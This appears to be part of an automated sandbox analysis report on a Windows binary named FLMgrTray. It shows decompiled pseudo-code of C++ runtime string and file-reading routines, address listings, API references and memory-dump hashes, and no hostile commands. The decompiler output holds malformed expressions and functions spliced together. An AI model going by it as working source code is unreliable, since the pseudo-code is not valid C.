                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t127 + 0x2c)))) =  *((intOrPtr*)(_t127 + 0x54)) - _t116;
                                                                                        						}
                                                                                        						if( *((intOrPtr*)(_t127 + 0x38)) != 0) {
                                                                                        							_v28 = 0;
                                                                                        							_v24 = 0xf;
                                                                                        							_v44 = 0;
                                                                                        							_t100 = fgetc;
                                                                                        							_v8 = 0;
                                                                                        							_t68 = fgetc( *(_t127 + 0x4c));
                                                                                        							_t141 = _t140 + 4;
                                                                                        							if(_t68 != 0xffffffff) {
                                                                                        								while(1) {
                                                                                        									E00169BD0(_t100,  &_v44, _t68);
                                                                                        									_t130 =  >=  ? _v44 :  &_v44;
                                                                                        									_t121 =  >=  ? _v44 :  &_v44;
                                                                                        									_t85 = _t127 + 0x40;
                                                                                        									__imp__?in@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD@Z(_t85,  >=  ? _v44 :  &_v44, _v28 + ( >=  ? _v44 :  &_v44),  &_v52,  &_v45,  &_v44,  &_v56);
                                                                                        									if(_t85 < 0) {
                                                                                        										goto L15;
                                                                                        									}
                                                                                        									if(_t85 > 1) {
                                                                                        										if(_t85 != 3) {
                                                                                        											goto L15;
                                                                                        										} else {
                                                                                        											_t87 =  >=  ? _v44 :  &_v44;
                                                                                        											_t131 =  *((char*)( >=  ? _v44 :  &_v44));
                                                                                        											goto L16;
                                                                                        										}
                                                                                        										goto L29;
                                                                                        									} else {
                                                                                        										if(_v56 !=  &_v45) {
                                                                                        											L20:
                                                                                        											_t75 =  >=  ? _v44 :  &_v44;
                                                                                        											_t110 = _v52;
                                                                                        											_t135 = _v28 - _t110 + ( >=  ? _v44 :  &_v44);
                                                                                        											if(_t135 > 0) {
                                                                                        												while(1) {
                                                                                        													_t76 =  *((char*)(_t135 + _t110 - 1));
                                                                                        													_t135 = _t135 - 1;
                                                                                        													ungetc(_t76,  *(_t127 + 0x4c));
                                                                                        													_t141 = _t141 + 8;
                                                                                        													if(_t135 <= 0) {
                                                                                        														goto L24;
                                                                                        													}
                                                                                        													_t110 = _v52;
                                                                                        												}
                                                                                        											}
                                                                                        											L24:
                                                                                        										} else {
                                                                                        											_t114 =  >=  ? _v44 :  &_v44;
                                                                                        											_t90 = _v52 - ( >=  ? _v44 :  &_v44);
                                                                                        											_push(_v52 - ( >=  ? _v44 :  &_v44));
                                                                                        											E00184E80(_t100,  &_v44, 0);
                                                                                        											_t68 = fgetc( *(_t127 + 0x4c));
                                                                                        											_t141 = _t141 + 4;
                                                                                        											if(_t68 != 0xffffffff) {
                                                                                        												continue;
                                                                                        											} else {
                                                                                        												goto L15;
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        									goto L16;
                                                                                        								}
                                                                                        								goto L15;
                                                                                        							}
                                                                                        							L16:
                                                                                        							_t118 = _v24;
                                                                                        							if(_t118 >= 0x10) {
                                                                                        								_t109 = _v44;
                                                                                        								_t119 = _t118 + 1;
                                                                                        								_t71 = _t109;
                                                                                        								if(_t119 < 0x1000) {
                                                                                        									L27:
                                                                                        									_push(_t119);
                                                                                        									E00175733(_t71, _t109);
                                                                                        								} else {
                                                                                        									_t109 =  *((intOrPtr*)(_t109 - 4));
                                                                                        									_t119 = _t119 + 0x23;
                                                                                        									if(_t71 <= 0x1f) {
                                                                                        										goto L27;
                                                                                        									} else {
                                                                                        										__imp___invalid_parameter_noinfo_noreturn();
                                                                                        										goto L20;
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        						} else {
                                                                                        							if(fgetc( *(_t127 + 0x4c)) == 0xffffffff) {
                                                                                        								goto L4;
                                                                                        							} else {
                                                                                        							}
                                                                                        						}
                                                                                        					} else {
                                                                                        						L4:
                                                                                        					}
                                                                                        				} else {
                                                                                        					_t124 =  *((intOrPtr*)(__ecx + 0x2c));
                                                                                        					_t137 =  *_t124;
                                                                                        					_t66 = _t137 + _t104;
                                                                                        					if(_t104 >= _t137 + _t104) {
                                                                                        						goto L3;
                                                                                        					} else {
                                                                                        						 *_t124 = _t137 - 1;
                                                                                        						 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)))) + 1;
                                                                                        					}
                                                                                        				}
                                                                                        				L29:
                                                                                        				 *[fs:0x0] = _v16;
                                                                                        				return E001755F4(_v20 ^ _t138);
                                                                                        			}



































                                                                                        0x00185443
                                                                                        0x00185445
                                                                                        0x00185450
                                                                                        0x00185451
                                                                                        0x00185454
                                                                                        0x00185459
                                                                                        0x0018545b
                                                                                        0x00185461
                                                                                        0x00185465
                                                                                        0x0018546b
                                                                                        0x00185470
                                                                                        0x00185474
                                                                                        0x00185499
                                                                                        0x0018549d
                                                                                        0x001854a7
                                                                                        0x001854af
                                                                                        0x001854b4
                                                                                        0x001854b9
                                                                                        0x001854be
                                                                                        0x001854c3
                                                                                        0x001854c3
                                                                                        0x001854c9
                                                                                        0x001854e4
                                                                                        0x001854eb
                                                                                        0x001854f2
                                                                                        0x001854f9
                                                                                        0x001854ff
                                                                                        0x00185506
                                                                                        0x00185508
                                                                                        0x0018550e
                                                                                        0x00185510
                                                                                        0x00185514
                                                                                        0x00185526
                                                                                        0x0018552d
                                                                                        0x00185545
                                                                                        0x00185549
                                                                                        0x00185551
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00185556
                                                                                        0x00185601
                                                                                        0x00000000
                                                                                        0x00185603
                                                                                        0x0018560a
                                                                                        0x0018560e
                                                                                        0x00000000
                                                                                        0x0018560e
                                                                                        0x00000000
                                                                                        0x0018555c
                                                                                        0x00185562
                                                                                        0x001855bf
                                                                                        0x001855c9
                                                                                        0x001855cd
                                                                                        0x001855d2
                                                                                        0x001855d6
                                                                                        0x001855e0
                                                                                        0x001855e3
                                                                                        0x001855e8
                                                                                        0x001855ea
                                                                                        0x001855ec
                                                                                        0x001855f1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001855f3
                                                                                        0x001855f3
                                                                                        0x001855e0
                                                                                        0x001855f8
                                                                                        0x00185564
                                                                                        0x0018556e
                                                                                        0x00185572
                                                                                        0x00185577
                                                                                        0x0018557a
                                                                                        0x00185582
                                                                                        0x00185584
                                                                                        0x0018558a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0018558a
                                                                                        0x00185562
                                                                                        0x00000000
                                                                                        0x00185556
                                                                                        0x00000000
                                                                                        0x00185510
                                                                                        0x0018558f
                                                                                        0x0018558f
                                                                                        0x00185595
                                                                                        0x0018559b
                                                                                        0x0018559e
                                                                                        0x0018559f
                                                                                        0x001855a7
                                                                                        0x00185616
                                                                                        0x00185616
                                                                                        0x00185618
                                                                                        0x001855a9
                                                                                        0x001855a9
                                                                                        0x001855ac
                                                                                        0x001855b7
                                                                                        0x00000000
                                                                                        0x001855b9
                                                                                        0x001855b9
                                                                                        0x00000000
                                                                                        0x001855b9
                                                                                        0x001855b7
                                                                                        0x001855a7
                                                                                        0x001854cb
                                                                                        0x001854da
                                                                                        0x00000000
                                                                                        0x001854dc
                                                                                        0x001854dc
                                                                                        0x001854da
                                                                                        0x0018549f
                                                                                        0x0018549f
                                                                                        0x0018549f
                                                                                        0x00185476
                                                                                        0x00185476
                                                                                        0x00185479
                                                                                        0x0018547b
                                                                                        0x00185480
                                                                                        0x00000000
                                                                                        0x00185482
                                                                                        0x00185485
                                                                                        0x0018548f
                                                                                        0x00185491
                                                                                        0x00185480
                                                                                        0x00185622
                                                                                        0x00185625
                                                                                        0x0018563d

                                                                                        APIs
                                                                                        • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 001854CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: fgetc
                                                                                        • String ID:
                                                                                        • API String ID: 2807381905-0
                                                                                        • Opcode ID: 9523e609c424387bc244988da331162e6aaa3f99ec2728f3aaa7f44a03b70a5a
                                                                                        • Instruction ID: 7e2d10af52dabb6f68ea0911765e067d0c4014c4bcbb9b8821cac18c88d2681c
                                                                                        • Opcode Fuzzy Hash: 9523e609c424387bc244988da331162e6aaa3f99ec2728f3aaa7f44a03b70a5a
                                                                                        • Instruction Fuzzy Hash: A4618571A00519DFCB15DF58D880AEEBBB6FF08321F54422AD815A7690D735EA94CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 49%
                                                                                        			E001632D0(void* __ebx, void* __ecx, void* __edi, void* _a4, signed int _a8) {
                                                                                        				void* _v0;
                                                                                        				void* _v4;
                                                                                        				void* _v8;
                                                                                        				void _v12;
                                                                                        				signed int _v16;
                                                                                        				int _v20;
                                                                                        				signed int _v36;
                                                                                        				intOrPtr _v48;
                                                                                        				intOrPtr _v52;
                                                                                        				char* _v56;
                                                                                        				char _v68;
                                                                                        				char _v76;
                                                                                        				char _v80;
                                                                                        				signed int _t102;
                                                                                        				signed int _t105;
                                                                                        				void* _t114;
                                                                                        				void _t116;
                                                                                        				void* _t118;
                                                                                        				void* _t129;
                                                                                        				void _t131;
                                                                                        				unsigned int _t133;
                                                                                        				signed int _t139;
                                                                                        				void* _t144;
                                                                                        				signed int _t156;
                                                                                        				void* _t163;
                                                                                        				signed int _t164;
                                                                                        				void* _t166;
                                                                                        				signed int _t169;
                                                                                        				void* _t170;
                                                                                        				void* _t172;
                                                                                        				signed int _t175;
                                                                                        				void* _t177;
                                                                                        				signed int _t181;
                                                                                        				void* _t182;
                                                                                        				unsigned int _t186;
                                                                                        				signed int _t188;
                                                                                        				void* _t192;
                                                                                        				unsigned int _t194;
                                                                                        				void* _t198;
                                                                                        				void* _t201;
                                                                                        				unsigned int _t203;
                                                                                        				int _t208;
                                                                                        				void* _t209;
                                                                                        				signed int _t215;
                                                                                        				signed int _t216;
                                                                                        				int _t217;
                                                                                        				void* _t219;
                                                                                        				void* _t221;
                                                                                        				void* _t224;
                                                                                        				int _t225;
                                                                                        				char* _t226;
                                                                                        				signed int _t229;
                                                                                        				signed int _t230;
                                                                                        				int _t232;
                                                                                        				signed int _t240;
                                                                                        				signed int _t241;
                                                                                        				signed int _t243;
                                                                                        
                                                                                        				_t163 = _a8;
                                                                                        				_t224 = __ecx;
                                                                                        				_t203 =  *(__ecx + 0x14);
                                                                                        				_t181 =  *(__ecx + 0x10);
                                                                                        				_v8 = _t181;
                                                                                        				_v16 = _t203;
                                                                                        				if(_t163 > _t203 - _t181) {
                                                                                        					if(0x7ffffffe - _t181 < _t163) {
                                                                                        						E001631F0(_t203);
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						_t240 = _t243;
                                                                                        						_push(_t181);
                                                                                        						_push(_t163);
                                                                                        						_push(_t224);
                                                                                        						_t225 = _t181;
                                                                                        						_t208 = _v20;
                                                                                        						_t182 =  *(_t225 + 0x14);
                                                                                        						_v36 = _t182;
                                                                                        						if(_t208 > _t182) {
                                                                                        							if(_t208 > 0x7fffffff) {
                                                                                        								L35:
                                                                                        								E001631F0(_t203);
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								_push(_t240);
                                                                                        								_t241 = _t243;
                                                                                        								_push(_t182);
                                                                                        								_t102 = _v36;
                                                                                        								_push(_t163);
                                                                                        								_push(_t225);
                                                                                        								_push(_t208);
                                                                                        								_t209 = _t182;
                                                                                        								_t164 =  *(_t209 + 0x14);
                                                                                        								if(_t102 > _t164) {
                                                                                        									if(_t102 > 0x7ffffffe) {
                                                                                        										L53:
                                                                                        										E001631F0(_t203);
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										_push(_t241);
                                                                                        										_push(0xffffffff);
                                                                                        										_push(E0018CBB9);
                                                                                        										_push( *[fs:0x0]);
                                                                                        										_push(_t182);
                                                                                        										_push(_t225);
                                                                                        										_t105 =  *0x19d05c; // 0x2c80d730
                                                                                        										_push(_t105 ^ _t243);
                                                                                        										 *[fs:0x0] =  &_v76;
                                                                                        										_v80 = 0;
                                                                                        										_t226 = _v56;
                                                                                        										 *((intOrPtr*)(_t226 + 0x10)) = 0;
                                                                                        										 *((intOrPtr*)(_t226 + 0x14)) = 0xf;
                                                                                        										 *_t226 = 0;
                                                                                        										_v68 = 0;
                                                                                        										_v80 = 1;
                                                                                        										E001636C0(_v52, _t226, _v48);
                                                                                        										 *[fs:0x0] = _v76;
                                                                                        										return _t226;
                                                                                        									} else {
                                                                                        										_t229 = _t102 | 0x00000007;
                                                                                        										if(_t229 <= 0x7ffffffe) {
                                                                                        											_t186 = _t164 >> 1;
                                                                                        											if(_t164 <= 0x7ffffffe - _t186) {
                                                                                        												_t230 =  <  ? _t186 + _t164 : _t229;
                                                                                        											} else {
                                                                                        												_t230 = 0x7ffffffe;
                                                                                        											}
                                                                                        										} else {
                                                                                        											_t230 = 0x7ffffffe;
                                                                                        										}
                                                                                        										_t73 = _t230 + 1; // 0x7fffffff
                                                                                        										_t114 = E00163260(_t203, _t73);
                                                                                        										_t188 = _v0;
                                                                                        										 *(_t209 + 0x14) = _t230;
                                                                                        										_v16 = _t114;
                                                                                        										 *(_t209 + 0x10) = _t188;
                                                                                        										_t225 = _t188 + _t188;
                                                                                        										memcpy(_t114, _v4, _t225);
                                                                                        										_t116 = _v16;
                                                                                        										_t243 = _t243 + 0xc;
                                                                                        										 *((short*)(_t225 + _t116)) = 0;
                                                                                        										if(_t164 < 8) {
                                                                                        											L51:
                                                                                        											 *_t209 = _t116;
                                                                                        											return _t209;
                                                                                        										} else {
                                                                                        											_t118 =  *_t209;
                                                                                        											_t166 = 2 + _t164 * 2;
                                                                                        											if(_t166 < 0x1000) {
                                                                                        												L50:
                                                                                        												_push(_t166);
                                                                                        												E00175733(_t118, _t118);
                                                                                        												_t116 = _v16;
                                                                                        												goto L51;
                                                                                        											} else {
                                                                                        												_t182 =  *(_t118 - 4);
                                                                                        												_t166 = _t166 + 0x23;
                                                                                        												if(_t118 - _t182 + 0xfffffffc > 0x1f) {
                                                                                        													__imp___invalid_parameter_noinfo_noreturn();
                                                                                        													goto L53;
                                                                                        												} else {
                                                                                        													_t118 = _t182;
                                                                                        													goto L50;
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								} else {
                                                                                        									_v0 = _t209;
                                                                                        									if(_t164 >= 8) {
                                                                                        										_t182 =  *_t209;
                                                                                        										_v0 = _t182;
                                                                                        									}
                                                                                        									_t232 = _t102 + _t102;
                                                                                        									 *(_t209 + 0x10) = _t102;
                                                                                        									memmove(_t182, _v4, _t232);
                                                                                        									 *((short*)(_v0 + _t232)) = 0;
                                                                                        									return _t209;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t169 = _t208 | 0x0000000f;
                                                                                        								if(_t169 <= 0x7fffffff) {
                                                                                        									_t203 = _t182 >> 1;
                                                                                        									if(_t182 <= 0x7fffffff - _t203) {
                                                                                        										_t170 =  <  ? _t182 + _t203 : _t169;
                                                                                        									} else {
                                                                                        										_t170 = 0x7fffffff;
                                                                                        									}
                                                                                        								} else {
                                                                                        									_t170 = 0x7fffffff;
                                                                                        								}
                                                                                        								_t54 = _t170 + 1; // 0x80000000
                                                                                        								_t129 = E00163200(_t203, _t54);
                                                                                        								 *(_t225 + 0x14) = _t170;
                                                                                        								_t163 = _t129;
                                                                                        								_a4 = _t129;
                                                                                        								 *(_t225 + 0x10) = _t208;
                                                                                        								memcpy(_t163, _v0, _t208);
                                                                                        								_t131 = _v12;
                                                                                        								_t243 = _t243 + 0xc;
                                                                                        								 *((char*)(_t163 + _t208)) = 0;
                                                                                        								if(_t131 < 0x10) {
                                                                                        									L33:
                                                                                        									 *_t225 = _t163;
                                                                                        									return _t225;
                                                                                        								} else {
                                                                                        									_t192 = _t131 + 1;
                                                                                        									_t133 =  *_t225;
                                                                                        									if(_t192 < 0x1000) {
                                                                                        										L32:
                                                                                        										_push(_t192);
                                                                                        										E00175733(_t133, _t133);
                                                                                        										goto L33;
                                                                                        									} else {
                                                                                        										_t203 =  *(_t133 - 4);
                                                                                        										_t182 = _t192 + 0x23;
                                                                                        										if(_t133 - _t203 + 0xfffffffc > 0x1f) {
                                                                                        											__imp___invalid_parameter_noinfo_noreturn();
                                                                                        											goto L35;
                                                                                        										} else {
                                                                                        											_t133 = _t203;
                                                                                        											goto L32;
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        						} else {
                                                                                        							_t172 = _t225;
                                                                                        							if(_t182 >= 0x10) {
                                                                                        								_t172 =  *_t225;
                                                                                        							}
                                                                                        							 *(_t225 + 0x10) = _t208;
                                                                                        							memmove(_t172, _v0, _t208);
                                                                                        							 *((char*)(_t172 + _t208)) = 0;
                                                                                        							return _t225;
                                                                                        						}
                                                                                        					} else {
                                                                                        						_t139 = _t163 + _t181;
                                                                                        						_a8 = _t139;
                                                                                        						_t215 = _t139 | 0x00000007;
                                                                                        						if(_t215 <= 0x7ffffffe) {
                                                                                        							_t194 = _t203 >> 1;
                                                                                        							if(_t203 <= 0x7ffffffe - _t194) {
                                                                                        								_t216 =  <  ? _t194 + _t203 : _t215;
                                                                                        							} else {
                                                                                        								_t216 = 0x7ffffffe;
                                                                                        							}
                                                                                        						} else {
                                                                                        							_t216 = 0x7ffffffe;
                                                                                        						}
                                                                                        						_t19 = _t216 + 1; // 0x7fffffff
                                                                                        						_t144 = E00163260(_t203, _t19);
                                                                                        						 *((intOrPtr*)(_t224 + 0x10)) = _a8;
                                                                                        						_t198 = _v8 + _v8;
                                                                                        						 *(_t224 + 0x14) = _t216;
                                                                                        						_t217 = _t163 + _t163;
                                                                                        						_v12 = _t144;
                                                                                        						_v20 = _t217;
                                                                                        						_v8 = _t198 + _t144;
                                                                                        						_t175 = _v16;
                                                                                        						_a8 = _t144 + _a8 * 2;
                                                                                        						_push(_t198);
                                                                                        						if(_t175 < 8) {
                                                                                        							L16:
                                                                                        							memcpy(_t144, _t224, ??);
                                                                                        							memcpy(_v8, _a4, _t217);
                                                                                        							 *_a8 = 0;
                                                                                        							 *_t224 = _v12;
                                                                                        							return _t224;
                                                                                        						} else {
                                                                                        							_t219 =  *_t224;
                                                                                        							memcpy(_t144, _t219, ??);
                                                                                        							memcpy(_v8, _a4, _v20);
                                                                                        							_t152 = _a8;
                                                                                        							_t177 = 2 + _t175 * 2;
                                                                                        							_t243 = _t243 + 0x18;
                                                                                        							 *_a8 = 0;
                                                                                        							if(_t177 < 0x1000) {
                                                                                        								L14:
                                                                                        								_push(_t177);
                                                                                        								E00175733(_t152, _t219);
                                                                                        								 *_t224 = _v12;
                                                                                        								return _t224;
                                                                                        							} else {
                                                                                        								_t201 =  *(_t219 - 4);
                                                                                        								_t177 = _t177 + 0x23;
                                                                                        								_t217 = _t219 - _t201;
                                                                                        								_t41 = _t217 - 4; // 0x7ffffffa
                                                                                        								_t144 = _t41;
                                                                                        								if(_t144 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        									goto L16;
                                                                                        								} else {
                                                                                        									_t219 = _t201;
                                                                                        									goto L14;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				} else {
                                                                                        					_t156 = _t163 + _t181;
                                                                                        					_t221 = __ecx;
                                                                                        					_a8 = _t156;
                                                                                        					 *(__ecx + 0x10) = _t156;
                                                                                        					if(_t203 >= 8) {
                                                                                        						_t221 =  *((intOrPtr*)(__ecx));
                                                                                        					}
                                                                                        					memmove(_t221 + _t181 * 2, _a4, _t163 + _t163);
                                                                                        					 *((short*)(_t221 + _a8 * 2)) = 0;
                                                                                        					return _t224;
                                                                                        				}
                                                                                        			}




























































                                                                                        0x001632d7
                                                                                        0x001632db
                                                                                        0x001632de
                                                                                        0x001632e3
                                                                                        0x001632e8
                                                                                        0x001632eb
                                                                                        0x001632f0
                                                                                        0x00163334
                                                                                        0x0016343d
                                                                                        0x00163442
                                                                                        0x00163443
                                                                                        0x00163444
                                                                                        0x00163445
                                                                                        0x00163446
                                                                                        0x00163447
                                                                                        0x00163448
                                                                                        0x00163449
                                                                                        0x0016344a
                                                                                        0x0016344b
                                                                                        0x0016344c
                                                                                        0x0016344d
                                                                                        0x0016344e
                                                                                        0x0016344f
                                                                                        0x00163451
                                                                                        0x00163453
                                                                                        0x00163454
                                                                                        0x00163455
                                                                                        0x00163456
                                                                                        0x00163459
                                                                                        0x0016345c
                                                                                        0x0016345f
                                                                                        0x00163464
                                                                                        0x00163494
                                                                                        0x00163537
                                                                                        0x00163537
                                                                                        0x0016353c
                                                                                        0x0016353d
                                                                                        0x0016353e
                                                                                        0x0016353f
                                                                                        0x00163540
                                                                                        0x00163541
                                                                                        0x00163543
                                                                                        0x00163544
                                                                                        0x00163547
                                                                                        0x00163548
                                                                                        0x00163549
                                                                                        0x0016354a
                                                                                        0x0016354c
                                                                                        0x00163551
                                                                                        0x0016358c
                                                                                        0x0016363c
                                                                                        0x0016363c
                                                                                        0x00163641
                                                                                        0x00163642
                                                                                        0x00163643
                                                                                        0x00163644
                                                                                        0x00163645
                                                                                        0x00163646
                                                                                        0x00163647
                                                                                        0x00163648
                                                                                        0x00163649
                                                                                        0x0016364a
                                                                                        0x0016364b
                                                                                        0x0016364c
                                                                                        0x0016364d
                                                                                        0x0016364e
                                                                                        0x0016364f
                                                                                        0x00163650
                                                                                        0x00163653
                                                                                        0x00163655
                                                                                        0x00163660
                                                                                        0x00163661
                                                                                        0x00163662
                                                                                        0x00163663
                                                                                        0x0016366a
                                                                                        0x0016366e
                                                                                        0x00163674
                                                                                        0x0016367b
                                                                                        0x0016367e
                                                                                        0x00163685
                                                                                        0x0016368c
                                                                                        0x00163692
                                                                                        0x0016369d
                                                                                        0x001636a4
                                                                                        0x001636b1
                                                                                        0x001636bd
                                                                                        0x00163592
                                                                                        0x00163594
                                                                                        0x0016359d
                                                                                        0x001635ad
                                                                                        0x001635b3
                                                                                        0x001635c1
                                                                                        0x001635b5
                                                                                        0x001635b5
                                                                                        0x001635b5
                                                                                        0x0016359f
                                                                                        0x0016359f
                                                                                        0x0016359f
                                                                                        0x001635c4
                                                                                        0x001635ca
                                                                                        0x001635cf
                                                                                        0x001635d2
                                                                                        0x001635d5
                                                                                        0x001635d8
                                                                                        0x001635db
                                                                                        0x001635e3
                                                                                        0x001635e8
                                                                                        0x001635ed
                                                                                        0x001635f0
                                                                                        0x001635f7
                                                                                        0x00163629
                                                                                        0x00163629
                                                                                        0x00163633
                                                                                        0x001635f9
                                                                                        0x001635f9
                                                                                        0x001635fb
                                                                                        0x00163608
                                                                                        0x0016361c
                                                                                        0x0016361c
                                                                                        0x0016361e
                                                                                        0x00163623
                                                                                        0x00000000
                                                                                        0x0016360a
                                                                                        0x0016360a
                                                                                        0x0016360d
                                                                                        0x00163618
                                                                                        0x00163636
                                                                                        0x00000000
                                                                                        0x0016361a
                                                                                        0x0016361a
                                                                                        0x00000000
                                                                                        0x0016361a
                                                                                        0x00163618
                                                                                        0x00163608
                                                                                        0x001635f7
                                                                                        0x00163553
                                                                                        0x00163553
                                                                                        0x00163559
                                                                                        0x0016355b
                                                                                        0x0016355d
                                                                                        0x0016355d
                                                                                        0x00163560
                                                                                        0x00163563
                                                                                        0x0016356b
                                                                                        0x00163578
                                                                                        0x00163584
                                                                                        0x00163584
                                                                                        0x0016349a
                                                                                        0x0016349c
                                                                                        0x001634a5
                                                                                        0x001634b5
                                                                                        0x001634bb
                                                                                        0x001634c9
                                                                                        0x001634bd
                                                                                        0x001634bd
                                                                                        0x001634bd
                                                                                        0x001634a7
                                                                                        0x001634a7
                                                                                        0x001634a7
                                                                                        0x001634cc
                                                                                        0x001634d2
                                                                                        0x001634db
                                                                                        0x001634de
                                                                                        0x001634e1
                                                                                        0x001634e4
                                                                                        0x001634e7
                                                                                        0x001634ec
                                                                                        0x001634ef
                                                                                        0x001634f2
                                                                                        0x001634f9
                                                                                        0x00163524
                                                                                        0x00163525
                                                                                        0x0016352e
                                                                                        0x001634fb
                                                                                        0x001634fb
                                                                                        0x001634fe
                                                                                        0x00163506
                                                                                        0x0016351a
                                                                                        0x0016351a
                                                                                        0x0016351c
                                                                                        0x00000000
                                                                                        0x00163508
                                                                                        0x00163508
                                                                                        0x0016350b
                                                                                        0x00163516
                                                                                        0x00163531
                                                                                        0x00000000
                                                                                        0x00163518
                                                                                        0x00163518
                                                                                        0x00000000
                                                                                        0x00163518
                                                                                        0x00163516
                                                                                        0x00163506
                                                                                        0x001634f9
                                                                                        0x00163466
                                                                                        0x00163466
                                                                                        0x0016346b
                                                                                        0x0016346d
                                                                                        0x0016346d
                                                                                        0x00163473
                                                                                        0x00163477
                                                                                        0x0016347f
                                                                                        0x0016348b
                                                                                        0x0016348b
                                                                                        0x0016333a
                                                                                        0x0016333a
                                                                                        0x0016333f
                                                                                        0x00163342
                                                                                        0x0016334b
                                                                                        0x0016335b
                                                                                        0x00163361
                                                                                        0x0016336f
                                                                                        0x00163363
                                                                                        0x00163363
                                                                                        0x00163363
                                                                                        0x0016334d
                                                                                        0x0016334d
                                                                                        0x0016334d
                                                                                        0x00163372
                                                                                        0x00163378
                                                                                        0x00163380
                                                                                        0x00163386
                                                                                        0x00163388
                                                                                        0x0016338b
                                                                                        0x0016338e
                                                                                        0x00163394
                                                                                        0x0016339a
                                                                                        0x001633a0
                                                                                        0x001633a3
                                                                                        0x001633a6
                                                                                        0x001633aa
                                                                                        0x0016340f
                                                                                        0x00163411
                                                                                        0x0016341d
                                                                                        0x0016342a
                                                                                        0x00163430
                                                                                        0x0016343a
                                                                                        0x001633ac
                                                                                        0x001633ac
                                                                                        0x001633b0
                                                                                        0x001633be
                                                                                        0x001633c3
                                                                                        0x001633c6
                                                                                        0x001633cf
                                                                                        0x001633d2
                                                                                        0x001633db
                                                                                        0x001633ef
                                                                                        0x001633ef
                                                                                        0x001633f1
                                                                                        0x001633fc
                                                                                        0x00163406
                                                                                        0x001633dd
                                                                                        0x001633dd
                                                                                        0x001633e0
                                                                                        0x001633e3
                                                                                        0x001633e5
                                                                                        0x001633e5
                                                                                        0x001633eb
                                                                                        0x00163409
                                                                                        0x00000000
                                                                                        0x001633ed
                                                                                        0x001633ed
                                                                                        0x00000000
                                                                                        0x001633ed
                                                                                        0x001633eb
                                                                                        0x001633db
                                                                                        0x001633aa
                                                                                        0x001632f2
                                                                                        0x001632f2
                                                                                        0x001632f5
                                                                                        0x001632f7
                                                                                        0x001632fa
                                                                                        0x00163300
                                                                                        0x00163302
                                                                                        0x00163302
                                                                                        0x0016330f
                                                                                        0x0016331c
                                                                                        0x00163328
                                                                                        0x00163328

                                                                                        APIs
                                                                                        • memmove.VCRUNTIME140(?,00000000,?,00000005,00000000,00000000), ref: 0016330F
                                                                                        • memcpy.VCRUNTIME140(00000000,7FFFFFFE,00000001,7FFFFFFF,00000005,00000000,00000000), ref: 001633B0
                                                                                        • memcpy.VCRUNTIME140(00000001,00000000,00000001,00000000,7FFFFFFE,00000001,7FFFFFFF,00000005,00000000,00000000), ref: 001633BE
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,7FFFFFFF,00000005,00000000,00000000), ref: 00163409
                                                                                        • memcpy.VCRUNTIME140(00000000,00000000,00000001,7FFFFFFF,00000005,00000000,00000000), ref: 00163411
                                                                                        • memcpy.VCRUNTIME140(00000001,00000000,7FFFFFFE,00000000,00000000,00000001,7FFFFFFF,00000005,00000000,00000000), ref: 0016341D
                                                                                          • Part of subcall function 001631F0: ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(string too long,0016353C,2C80D731,?,?,?,?,00176DD2,2C80D730,2C80D731,00000000,?,?,00181718,?,2C80D730), ref: 001631F5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
